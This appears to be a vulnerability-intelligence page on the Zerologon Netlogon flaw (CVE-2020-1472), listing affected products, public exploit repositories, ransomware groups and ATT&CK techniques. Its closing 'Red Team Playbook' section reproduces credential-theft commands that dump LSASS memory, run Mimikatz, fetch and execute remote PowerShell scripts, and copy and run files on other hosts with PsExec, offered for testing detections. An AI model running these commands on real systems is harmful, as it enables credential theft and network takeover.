CVE-2020-1472

MEDIUM CISA KEV EXPLOIT POC TTE Zero-Day Pub 17/08 Upd 21/10

Overview

This vulnerability is an elevation of privilege flaw rooted in improper authentication handling within the Netlogon Remote Protocol (MS-NRPC). The root cause lies in the insecure establishment of Netlogon secure channel connections to domain controllers, where cryptographic authentication enforcement is bypassed. The affected component is the Netlogon service in Microsoft Windows Server versions including 2004, which incorrectly validates secure channel requests, enabling unauthorized privileged access.

Vulnerability Description

An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. To exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access. Microsoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels. For guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020). When the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.

Impact

An attacker with network access to a domain controller can exploit this vulnerability without prior authentication or user interaction to gain domain administrator privileges. This enables full control over Active Directory, allowing unauthorized access to sensitive data, creation or modification of accounts, and lateral movement across the network. The elevated privileges undermine domain security, potentially resulting in widespread compromise of enterprise infrastructure and critical systems.

Solution

Microsoft has issued a phased two-part update to address this vulnerability by modifying Netlogon secure channel authentication enforcement. Customers running affected Windows Server versions, including 2004, should apply the security updates as outlined in the Microsoft security advisory available at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472. Administrators should follow the guidance on managing Netlogon secure channel connection changes and register for Microsoft Technical Security Notifications to receive update release alerts.

EPSS vs KEV Prediction — Evolution (30 days)

Affected Products (25)

Vendor Product Version CPE
microsoft Microsoft Windows Server 1903 All cpe:2.3:o:microsoft:windows_server_1903:*:*:*:*:*:*:*:*
microsoft Microsoft Windows Server 1909 All cpe:2.3:o:microsoft:windows_server_1909:*:*:*:*:*:*:*:*
microsoft Microsoft Windows Server 2004 N/A cpe:2.3:o:microsoft:windows_server_2004:-:*:*:*:*:*:*:*
microsoft Microsoft Windows Server 2008 r2 cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
microsoft Microsoft Windows Server 2012 N/A cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
microsoft Microsoft Windows Server 2012 r2 cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*
microsoft Microsoft Windows Server 2016 N/A cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*
microsoft Microsoft Windows Server 2019 N/A cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*
microsoft Microsoft Windows Server 20h2 N/A cpe:2.3:o:microsoft:windows_server_20h2:-:*:*:*:*:*:*:*
fedoraproject Fedoraproject Fedora 31 cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
fedoraproject Fedoraproject Fedora 32 cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
fedoraproject Fedoraproject Fedora 33 cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
opensuse Opensuse Leap 15.1 cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
opensuse Opensuse Leap 15.2 cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*
canonical Canonical Ubuntu Linux 14.04 cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
canonical Canonical Ubuntu Linux 16.04 cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
canonical Canonical Ubuntu Linux 16.04 cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*
canonical Canonical Ubuntu Linux 18.04 cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
canonical Canonical Ubuntu Linux 20.04 cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*
synology Synology Directory Server All cpe:2.3:a:synology:directory_server:*:*:*:*:*:*:*:*
+5 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Netlogon Weak Cryptographic Authentication
auxiliary/admin/dcerpc/cve_2020_1472_zerologon
Tom Tervoort, Spencer McIntyre, Dirk-jan Mollema Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
ZeroLogon - Netlogon Elevation of Privilege West Shepherd remote windows - View

GitHub PoCs (78)

Repository Author Stars Forks Date Link
bvcyber/CVE-2020-1472
Test tool for CVE-2020-1472
bvcyber 1837 354 2020-09-08 View
dirkjanm/CVE-2020-1472
PoC for Zerologon - all research credits go to Tom Tervoort of Secura
dirkjanm 1329 283 2020-09-14 View
risksense/zerologon
Exploit for zerologon cve-2020-1472
risksense 708 144 2020-09-14 View
VoidSec/CVE-2020-1472
Exploit Code for CVE-2020-1472 aka Zerologon
VoidSec 399 63 2020-09-14 View
bb00/zer0dump
Abuse CVE-2020-1472 (Zerologon) to take over a domain and then repair the local stored machine account password.
bb00 179 36 2020-09-14 View
mstxq17/cve-2020-1472
cve-2020-1472 复现利用及其exp
mstxq17 113 24 2020-09-16 View
Rvn0xsy/ZeroLogon
CVE-2020-1472 C++
Rvn0xsy 83 8 2022-08-31 View
k8gege/CVE-2020-1472-EXP
Ladon Moudle CVE-2020-1472 Exploit 域控提权神器
k8gege 58 21 2020-09-15 View
zeronetworks/zerologon
Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB
zeronetworks 61 13 2020-09-17 View
cube0x0/CVE-2020-1472
cube0x0 38 7 2020-09-14 View
Privia-Security/ADZero
Zerologon AutoExploit Tool | CVE-2020-1472
Privia-Security 22 7 2020-09-29 View
sho-luv/zerologon
Zerologon Check and Exploit - Discovered by Tom Tervoort of Secura and expanded on @Dirkjanm's cve-2020-1472 coded examp...
sho-luv 18 3 2021-01-20 View
sv3nbeast/CVE-2020-1472
CVE-2020-1472复现时使用的py文件整理打包
sv3nbeast 10 8 2020-09-18 View
WiIs0n/Zerologon_CVE-2020-1472
POC for checking multiple hosts for Zerologon vulnerability
WiIs0n 11 5 2020-09-29 View
B34MR/zeroscan
Zeroscan is a Domain Controller vulnerability scanner, that currently includes checks for Zerologon (CVE-2020-1472), MS-...
B34MR 11 4 2021-06-23 View
thatonesecguy/zerologon-CVE-2020-1472
PoC for Zerologon (CVE-2020-1472) - Exploit
thatonesecguy 7 5 2020-09-15 View
CPO-EH/CVE-2020-1472_ZeroLogonChecker
C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon
CPO-EH 5 5 2020-10-17 View
YossiSassi/ZeroLogon-Exploitation-Check
quick'n'dirty automated checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon), using leading artifects in d...
YossiSassi 7 2 2021-01-07 View
striveben/CVE-2020-1472
striveben 5 0 2020-09-26 View
NAXG/CVE-2020-1472
CVE-2020-1472复现流程
NAXG 4 1 2020-09-15 View
CanciuCostin/CVE-2020-1472
CVE-2020-1472 - Zero Logon vulnerability Python implementation
CanciuCostin 2 3 2020-09-16 View
mods20hh/ZeroLogon-PoC-DC-Pwn
Zerologon (CVE-2020-1472) Proof-of-Concept application - Critical Active Directory vulnerability exploitation tool.
mods20hh 4 0 2025-12-06 View
guglia001/MassZeroLogon
Tool for mass testing ZeroLogon vulnerability CVE-2020-1472
guglia001 3 1 2022-09-30 View
0xkami/CVE-2020-1472
CVE-2020-1472漏洞复现过程
0xkami 2 2 2020-09-15 View
0xcccc666/cve-2020-1472_Tool-collection
cve-2020-1472_Tool collection
0xcccc666 2 2 2020-09-16 View
erk3/zeroscan
Zeroscan is a Domain Controller vulnerability scanner, that currently includes checks for Zerologon (CVE-2020-1472), MS-...
erk3 0 3 2022-04-09 View
murataydemir/CVE-2020-1472
[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)
murataydemir 1 2 2020-09-16 View
Udyz/Zerologon
Exploit Code for CVE-2020-1472 aka Zerologon
Udyz 1 2 2021-04-06 View
Anonymous-Family/Zero-day-scanning
Zero-day-scanning is a Domain Controller vulnerability scanner, that currently includes checks for Zero-day-scanning (CV...
Anonymous-Family 1 2 2022-03-03 View
rhymeswithmogul/Set-ZerologonMitigation
Protect your domain controllers against Zerologon (CVE-2020-1472).
rhymeswithmogul 2 1 2020-09-30 View
wrathfulDiety/zerologon
zerologon script to exploit CVE-2020-1472 CVSS 10/10
wrathfulDiety 2 0 2021-01-01 View
jiushill/CVE-2020-1472
CVE-2020-1472
jiushill 1 1 2020-09-15 View
npocmak/CVE-2020-1472
https://github.com/dirkjanm/CVE-2020-1472
npocmak 1 1 2020-09-16 View
midpipps/CVE-2020-1472-Easy
A simple implementation/code smash of a bunch of other repos
midpipps 1 1 2020-09-19 View
carlos55ml/zerologon
Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472).
carlos55ml 0 2 2022-03-29 View
shanfenglan/cve-2020-1472
shanfenglan 2 0 2020-10-10 View
Fa1c0n35/SecuraBV-CVE-2020-1472
Fa1c0n35 2 0 2020-09-16 View
Akash7350/CVE-2020-1472
Akash7350 2 0 2023-04-30 View
whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC
whoami-chmod777 2 0 2024-01-25 View
FaFcFF41/CVE-2020-1472
FaFcFF41 0 1 2020-09-16 View
McKinnonIT/zabbix-template-CVE-2020-1472
Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - C...
McKinnonIT 1 0 2020-09-16 View
mingchen-script/CVE-2020-1472-visualizer
mingchen-script 1 0 2020-11-05 View
TheJoyOfHacking/dirkjanm-CVE-2020-1472
TheJoyOfHacking 1 0 2022-02-22 View
Tobey123/CVE-2020-1472-visualizer
Tobey123 0 1 2020-08-12 View
Fa1c0n35/CVE-2020-1472
Fa1c0n35 0 1 2020-09-16 View
TuanCui22/ZerologonWithImpacket-CVE2020-1472
A practical proof-of-concept for CVE-2020-1472 (Zerologon) using the Impacket library to exploit Netlogon vulnerability ...
TuanCui22 0 1 2024-12-28 View
metehangelgi/CVE-2020-1472-LAB
Lab introduction to ZeroLogon
metehangelgi 0 1 2024-02-12 View
b1ack0wl/CVE-2020-1472
b1ack0wl 1 0 2020-11-16 View
hell-moon/ZeroLogon-Exploit
Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null
hell-moon 1 0 2021-03-01 View
hectorgie/CVE-2020-1472
hectorgie 0 1 2020-09-19 View
victim10wq3/CVE-2020-1472
victim10wq3 0 1 2020-09-16 View
ckq7703/CVE-2020-1472
CVE-2020-1472
ckq7703 0 0 2026-08-25 View
abdullah50i/internal-penetration-testing-project-using-Metasploit
Initialized & connected PostgreSQL to Metasploit. Reconnoitered 10.1.16.0/24 with Nmap and imported results. Enumerated ...
abdullah50i 0 0 2026-07-23 View
noemvex/apex-predator
Advanced AD Offensive Engine. Automates the path from stealthy recon to domain compromise. Features unauthenticated SMB ...
noemvex 0 0 2026-01-29 View
grupooruss/CVE-2020-1472
CVE 2020-1472 Script de validación
grupooruss 0 0 2020-09-24 View
Fa1c0n35/CVE-2020-1472-02-
Fa1c0n35 0 0 2020-09-28 View
Whippet0/CVE-2020-1472
CVE-2020-1472
Whippet0 0 0 2020-09-28 View
maikelnight/zerologon
Check for events that indicate non compatible devices -> CVE-2020-1472
maikelnight 0 0 2020-10-15 View
JayP232/The_big_Zero
The following is the outcome of playing with CVE-2020-1472 and attempting to automate the process of gaining a shell on ...
JayP232 0 0 2020-11-10 View
SaharAttackit/CVE-2020-1472
SaharAttackit 0 0 2020-12-23 View
itssmikefm/CVE-2020-1472
itssmikefm 0 0 2021-04-22 View
TheJoyOfHacking/SecuraBV-CVE-2020-1472
TheJoyOfHacking 0 0 2022-02-22 View
Anonymous-Family/CVE-2020-1472
Test tool for CVE-2020-1472
Anonymous-Family 0 0 2022-03-03 View
likeww/MassZeroLogon
Tool for mass testing ZeroLogon vulnerability CVE-2020-1472
likeww 0 0 2022-09-30 View
dr4g0n23/CVE-2020-1472
dr4g0n23 0 0 2022-11-22 View
c3rrberu5/ZeroLogon-to-Shell
This is a combination of the zerologon_tester.py code (https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/z...
c3rrberu5 0 0 2023-08-14 View
logg-1/0logon
MS-NRPC (Microsoft NetLogon Remote Protocol)/CVE-2020-1472
logg-1 0 0 2024-01-07 View
JolynNgSC/Zerologon_CVE-2020-1472
JolynNgSC 0 0 2024-03-21 View
blackh00d/zerologon-poc
A script to exploit CVE-2020-1472 (Zerologon)
blackh00d 0 0 2024-06-06 View
johnpathe/zerologon-cve-2020-1472-notes
johnpathe 0 0 2020-09-20 View
tdevworks/CVE-2020-1472-ZeroLogon-Demo-Detection-Mitigation
tdevworks 0 0 2025-05-17 View
100HnoMeuNome/ZeroLogon-CVE-2020-1472-lab
Explicação e demonstração da vulnerabilidade ZeroLogon (CVE-2020-1472)
100HnoMeuNome 0 0 2025-10-04 View
puckiestyle/CVE-2020-1472
puckiestyle 0 0 2020-10-21 View
PakwanSK/Simulating-and-preventing-Zerologon-CVE-2020-1472-vulnerability-attacks.
Simulation of the Zerologon (CVE-2020-1472) vulnerability attack in Active Directory on Windows Server 2016 and the use ...
PakwanSK 0 0 2025-03-07 View
commit2main/zerologon-lab
Scripts for a lab environment demonstrating the Zerologon (CVE-2020-1472) vulnerability.
commit2main 0 0 2025-12-07 View
nyambiblaise/Domain-Controller-DC-Exploitation-with-Metasploit-Impacket
End-to-end Domain Controller exploitation using Metasploit and Impacket: discovered DC10, exploited Zerologon (CVE-2020-...
nyambiblaise 0 0 2025-10-18 View
Ken-Abruzzi/cve-2020-1472
Ken-Abruzzi 0 0 2020-09-30 View
t31m0/CVE-2020-1472
t31m0 0 0 2020-09-21 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest VERY HIGH
Sightings Extensive activity

Ransomware Groups 21

thegentlemen
CONFIRMED
868 victims
ransomware.live
2026-09-21
ransomhub
CONFIRMED
842 victims
ransomware.live
2026-09-21
bianlian
CONFIRMED
552 victims
correlation_misp
2026-04-05
blackbasta
CONFIRMED
523 victims
ransomware.live
2026-09-21
conti
CONFIRMED
351 victims
correlation_mitre
2026-04-05
rhysida
CONFIRMED
288 victims
correlation_misp
2026-04-05
lockbit
CONFIRMED
5 victims
ransomware.live
2026-09-21
lockbit
CONFIRMED
5 victims
correlation_misp
2026-04-05
lockbit 30
CONFIRMED
correlation_misp
2026-04-05
lockbit black
CONFIRMED
correlation_misp
2026-04-05
lockbit green
CONFIRMED
correlation_misp
2026-04-05
bian lian
CONFIRMED
correlation_misp
2026-04-05
lockbit 20
CONFIRMED
correlation_misp
2026-04-05
FIN7
CORRELATED
correlation_mitre
2026-04-05
CosmicBeetle
CORRELATED
correlation_misp
2026-04-05
Dragonfly
CORRELATED
correlation_mitre
2026-04-05
Earth Lusca
CORRELATED
correlation_mitre
2026-04-05
elpaco
CORRELATED
correlation_misp
2026-04-05
MuddyWater
CORRELATED
correlation_mitre
2026-04-05
menuPass
CORRELATED
correlation_mitre
2026-04-05
FIN12
CORRELATED
correlation_misp
2026-04-05

Threat Feed

75 events
2026-10-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-10-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-10-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-21
Exploited by thegentlemen

Ransomware group known to exploit this vulnerability. Tools: ADFind, AnyDesk, BloodHound, Censys, CertiHound (868 known victims)

2026-09-21
Exploited by ransomhub

Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)

2026-09-21
Exploited by blackbasta

Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)

2026-09-21
Exploited by lockbit

Ransomware group known to exploit this vulnerability (5 known victims)

2026-09-21
Exploited by thegentlemen

Ransomware group known to exploit this vulnerability. Tools: ADFind, AnyDesk, BloodHound, Censys, CertiHound (868 known victims)

2026-09-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-03
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-08-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-04-05
Exploited by bianlian

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)

2026-04-05
Exploited by conti

Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Bloodhound (351 known victims)

2026-04-05
Exploited by rhysida

Ransomware group known to exploit this vulnerability. Tools: AnyDesk, Impacket, NTDS Utility (ntdsutil), PowerView, PsExec (288 known victims)

2026-04-05
Exploited by lockbit

Ransomware group known to exploit this vulnerability (5 known victims)

2026-04-05
Exploited by lockbit 30

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit black

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit green

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by bian lian

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit 20

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by FIN7

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by CosmicBeetle

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Dragonfly

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Earth Lusca

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by elpaco

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by MuddyWater

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by menuPass

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by FIN12

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by ransomhub

Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)

2026-04-05
Exploited by bianlian

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)

2026-04-05
Exploited by blackbasta

Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)

2026-04-05
Exploited by conti

Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Bloodhound (351 known victims)

2026-04-05
Exploited by rhysida

Ransomware group known to exploit this vulnerability. Tools: AnyDesk, Impacket, NTDS Utility (ntdsutil), PowerView, PsExec (288 known victims)

2026-04-05
Exploited by lockbit

Ransomware group known to exploit this vulnerability (5 known victims)

2026-04-05
Exploited by lockbit black

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit 20

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by bian lian

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by CosmicBeetle

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Dragonfly

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by Earth Lusca

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit 30

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by elpaco

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by FIN12

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by MuddyWater

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by menuPass

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by lockbit green

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by FIN7

Ransomware group known to exploit this vulnerability

2021-11-03
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2020-08-12
PoC Published (78 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Detected as Exploited in the Wild (231 sightings)

Active exploitation confirmed with 231 sighting(s)

Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
57% auth_bypass
Insecure Direct Object Reference
55% idor
Privilege Escalation
54% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1053.005 Scheduled Task Kill Chain execution, persistence, privilege-escalation Windows
T1059.001 PowerShell Kill Chain execution Windows
T1003.001 LSASS Memory Kill Chain credential-access Windows
T1087.002 Domain Account Kill Chain discovery Linux, macOS, Windows
T1021.002 SMB/Windows Admin Shares Kill Chain lateral-movement Windows

CAPEC Attack Patterns

No CAPEC pattern mapped to this CVE.

Red Team Playbook

78 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1003.001 Create Mini Dump of LSASS.exe using ProcDump Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created...
Command (CMD)
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
T1003.001 Dump LSASS with createdump.exe from .Net v5 Windows PowerShell Privileged
Use createdump executable from .NET to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
Command (PowerShell)
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
T1003.001 Dump LSASS.exe Memory through Silent Process Exit Windows CMD Privileged
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to...
Command (CMD)
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.001 Dump LSASS.exe Memory using NanoDump Windows CMD Privileged
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory
Command (CMD)
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
T1003.001 Dump LSASS.exe Memory using Out-Minidump.ps1 Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created...
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
T1003.001 Dump LSASS.exe Memory using ProcDump Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is...
Command (CMD)
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
T1003.001 Dump LSASS.exe Memory using Windows Task Manager Windows Manual
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
T1003.001 Dump LSASS.exe Memory using comsvcs.dll Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
Command (PowerShell)
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
T1003.001 Dump LSASS.exe Memory using direct system calls and API unhooking Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection....
Command (CMD)
"#{dumpert_exe}"
T1003.001 Dump LSASS.exe using imported Microsoft DLLs Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that...
Command (PowerShell)
#{xordump_exe} -out #{output_file} -x 0x41
T1003.001 Dump LSASS.exe using lolbin rdrleakdiag.exe Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with lolbin rdrleakdiag.exe. Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
Command (PowerShell)
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
T1003.001 LSASS read with pypykatz Windows CMD Privileged
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes...
Command (CMD)
"#{venv_path}\Scripts\pypykatz" live lsa 
T1003.001 Offline Credential Theft With Mimikatz Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
Command (CMD)
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
T1003.001 Powershell Mimikatz Windows PowerShell Privileged
Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks...
Command (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
T1021.002 Copy and Execute File with PsExec Windows CMD Privileged
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
Command (CMD)
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
T1021.002 Execute command writing output to local Admin Share Windows CMD Privileged
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
Command (CMD)
